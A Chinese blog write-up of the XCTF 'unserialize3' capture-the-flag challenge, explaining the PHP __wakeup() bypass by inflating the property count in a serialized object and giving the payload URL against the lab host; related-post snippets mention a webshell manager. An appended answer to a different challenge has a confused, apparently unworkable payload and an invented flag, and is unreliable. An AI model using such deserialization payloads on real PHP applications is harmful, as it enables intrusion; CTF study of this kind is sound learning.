攻防世界Web高手进阶区WP(unserialize3)

最新推荐文章于 2023-09-17 20:43:23 发布
最新推荐文章于 2023-09-17 20:43:23 发布
阅读量230 收藏 1
点赞数 1
分类专栏: CTF xctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119352200
版权
CTF 同时被 3 个专栏收录
22 篇文章 2 订阅
订阅专栏
web
18 篇文章 0 订阅
订阅专栏
xctf
5 篇文章 0 订阅
订阅专栏

unserialize3

在这里插入图片描述
打开环境,是一段代码
在这里插入图片描述
function用于声明函数
在这里插入图片描述
PHP 的魔术方法函数
在这里插入图片描述
由上图可知,__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的,但是在题目代码中并没有序列化字符串。于是,我们这里实例化xctf类并对其使用序列化(这里就实例化xctf类为对象a)


<?php
class xctf{                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
$a = new xctf();           //使用new运算符来实例化该类(xctf)的对象为peak
echo(serialize($a));       //输出被序列化的对象(peak)
?>

执行php代码,结果如下:

在这里插入图片描述

O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}
/*xctf类后面有一个1,整个1表示的是xctf类中只有1个属性
__wakeup()漏洞就是与序列化字符串的整个属性个数有关。当序列化字符串所表示的对象,
其序列化字符串中属性个数大于真实属性个数时就会跳过__wakeup的执行,从而造成__wakeup()漏洞
*/

所以我们要将1改为2,构造pyload

http://111.200.241.244:53454/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

成功得到flag
在这里插入图片描述
本文参考这篇文章xctf的unserialize3
感谢这位大佬

00勇士王子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】unserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 4716
在 PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后进行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中进行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 692
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
PHP反序列化漏洞
Ferryman23333的博客
10-20 245
开始之前先讲一讲为什么要序列化 序列化 将对象的状态信息转换为可以存储或传输的形式 反序列化 把字节序列转化为对象的过程 PHP反序列化漏洞 PHP5 < 5.6.25 PHP7 < 7.0.10 PHP官方给了示例:https://bugs.php.net/bug.php?id=72663 这个漏洞核心:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeu...
攻防世界-unserialize3 (php反序列化)
最新发布
qq_51979295的博客
09-17 393
php反序列化;web安全
系列2:14、PHP反序列化漏洞相关
qq_44704184的博客
04-18 2090
Magic函数 魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖PHP的默认操作。 下列方法名被认为是魔术方法: __construct()、destruct()、.call()、__callStatic()、__getl)、__set()、__isset()、___unset()、__sleep()、__wakeup()、__serialize()、__unserialize()、__toString0)、__invoke()、__set_state()、__clone()、__debugInfo(
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6371
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
攻防世界-web高手进阶
zji
04-25 5305
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
实验吧WEB题目WP
08-10
标题《实验吧WEB题目WP》指的是参与“实验吧”平台上一系列与Web安全相关的挑战题目的解答方案(Writeups,简称WP)。这些挑战通常涵盖了多种Web安全问题,包括但不限于代码审计、服务器配置错误、SQL注入、跨站脚本...
php中unserialize返回false的解决方法
10-25
不过,在使用unserialize时可能会遇到返回false的情况,这通常意味着序列化的字符串中存在一些问题。针对这一问题,文章首先说明了php中unserialize函数返回false的解决方法。 首先,文章指出序列化是PHP程序设计中...
浅谈php函数serialize()与unserialize()的使用方法
10-25
unserialize()则用于将字符串形式的状态信息转换回原始的数组或对象。这种机制对于需要临时保存变量状态,然后重新加载它们的场景非常有用,例如,在会话管理或者数据持久化操作中。 序列化的数据通常包含了变量...
php函数serialize()与unserialize()用法实例
10-25
主要介绍了php函数serialize()与unserialize()用法,以实例形式详细讲述了php函数serialize()与unserialize()的适用情况与使用方法,具有很好的参考借鉴价值,需要的朋友可以参考下
php serialize()与unserialize() 不完全研究
10-19
例如,在提供的代码示例中,`$ourfirstdog` 是一个 `dog` 类的实例,通过 `serialize()` 函数,这个对象被转换为一个以 "O:" 开头的字符串,表示这是一个对象,接着的数字3代表类名的长度,"dog" 是类名,":" 后的...
XCTF攻防世界web进阶练习_ 3_unserialize3
silence1_的博客
04-30 3905
XCTF攻防世界web进阶练习—unserialize3 题目 题目是unserialize3,是反序列化的意思,应该是关于反序列化的题 打开题目,是一段残缺的php代码 代码定义了一个类,其中有一个魔法方法_wakeup(),_wakeup()会直接退出,并输出" bad requests " 末尾有" ?code= " 看样子是要构造url来绕过_wakeup()这个函数了。 首先_wak...
网安学习-反序列化漏洞
weixin_44770698的博客
06-06 817
初始序列化漏洞
XCTF-高手进阶unserialize3
1stPeak's Blog
06-24 3877
XCTF-高手进阶-第六题:unserialize3 目标: 了解php反序列化中__wakeup漏洞的利用 了解php魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toStri...
XCTF攻防世界进阶writeup(1-5)
stepone4ward的博客
07-04 1280
1. isc-06 进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。 2.NewsCenter 对search参数进行bool类型的盲注 import requests s=requests.session() url="http://111.198.29.45:38153/index.php" key='' for i in range(1...
攻防世界——web高手进阶题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
XCTF 攻防世界WEB 高手进阶 unserialize3
weixin_45844670的博客
08-22 319
打开链接得到: 题目提醒是反序列化漏洞 这里有详细讲解反序列化漏洞: 写一段代码执行 <?php class xctf{ //类 public $flag = '111';//public定义flag变量公开可见 public function __wakeup(){ exit('bad requests'); } }//少了一个} $a=new xctf(); echo(serialize($a)); ?> O:4:"xctf":1:{s:4:"flag";s:3:"111";} 如果直
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('flag','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } if(isset($_GET['a'])){ $a = unserialize($_GET['a']); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的题目,传入参数为 $_GET['a'],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents('/flag'),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\'|\"/i,如果匹配到就会输出 'hacker!'。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据题目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('/show|flag|_|\s|\(|\)|{|}|\'|\"/i','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|'|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值